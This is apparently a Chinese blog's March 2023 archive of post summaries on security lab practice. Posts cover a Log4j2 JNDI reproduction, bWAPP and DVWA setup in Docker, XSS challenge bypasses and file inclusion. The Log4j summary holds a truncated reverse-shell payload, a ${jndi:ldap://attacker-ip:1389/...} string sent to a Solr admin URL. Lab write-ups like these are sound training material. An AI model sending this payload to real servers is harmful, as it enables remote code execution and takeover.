03 2023 档案

摘要:【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba 阅读全文
posted @ 2023-03-31 10:37 向上的熊心 阅读(194) 评论(0) 推荐(0) 编辑
摘要:(1)docker search bwapp,(2)docker pull 镜像名称,(3)启动容器,(4)浏览器中访问http://本机ip:端口/login.php:会出现提示:(5)访问http://本机ip:端口/install.php做数据库初始化操作,(6)重新登录, 阅读全文
posted @ 2023-03-21 10:17 向上的熊心 阅读(34) 评论(0) 推荐(0) 编辑
摘要:docker-compose up 拉取环境出现如下报错,看到Timeout以为是网络不好,其实不然,用vim /etc/docker/daemon.json添加新的镜像地址, 再次docker-compose的时候就顺利进行了。 阅读全文
posted @ 2023-03-16 16:03 向上的熊心 阅读(24) 评论(0) 推荐(0) 编辑
摘要:Level8:尝试利用编码绕过,代码转换机制将script中的ri变成了r_i,所只编码r和i试试(html实体编码和hex编码都可以绕过):字母十进制十六进制(hex)rrriiiscript的实体编码:scri&#x 阅读全文
posted @ 2023-03-14 16:27 向上的熊心 阅读(61) 评论(0) 推荐(0) 编辑
摘要:Level1:(1)(2)(3)Level2:(1)(2)通过点击 “ 搜索 ” 按钮,将输入框内的内容以 get 方式提交给 服务器上的 level2.php ;经过服务器的动态处理之后又会将参数 keyword 的值插入到 <h2> </h2> 标签之中以及 添加到 <input> 标签中的 v 阅读全文
posted @ 2023-03-10 16:02 向上的熊心 阅读(32) 评论(0) 推荐(0) 编辑
摘要:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件包含漏洞:能够通过url地址对远程 阅读全文
posted @ 2023-03-05 13:10 向上的熊心 阅读(41) 评论(0) 推荐(0) 编辑
摘要:前提,已经安装好docker。首先,搜索DVWA镜像,安装,安装完成后,docker images查看已有镜像,然后运行dvwa镜像,与容器进行交互,访问ip:端口,出现如下界面则搭建成功,点击“Create/Reset Database”,默认登录为admin、password, 阅读全文
posted @ 2023-03-02 17:09 向上的熊心 阅读(181) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示